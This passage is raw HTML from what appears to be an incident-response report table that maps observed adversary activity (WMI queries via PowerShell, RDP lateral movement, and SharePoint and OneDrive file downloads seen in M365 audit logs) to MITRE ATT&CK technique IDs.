SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1940379604" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{70}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">4</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="34" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="894532310" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{77}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1854116220" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{78}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1047: Windows Management Instrumentation&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1693575630" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{85}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used PowerShell scripts to leverage WMI (Get-</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">WmiObject</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">) to query remote computers.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2077741862" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{92}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">3</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="35" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1202573093" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{81}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1476974700" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{100}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1021.001: Remote Services: Remote Desktop Protocol</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="146781428" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{107}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used RDP connections between hosts.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1804324673" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{114}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">3</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="36" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="592056991" paraeid="{c78e680b-ab90-4a14-b0fc-aac8611ba9e2}{143}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Collection</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1946636763" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{144}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1530: Data from Cloud Storage Object&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1555578197" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{151}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The analysis of M365 Audit Logs showed multiple<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">FileAccessed</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">and FileDownloaded events for documents stored in SharePoint and OneDrive.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="381471465" paraeid="{9e8ad2ee-67b0-484f-88bc-531bcf9315f1}{158}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; 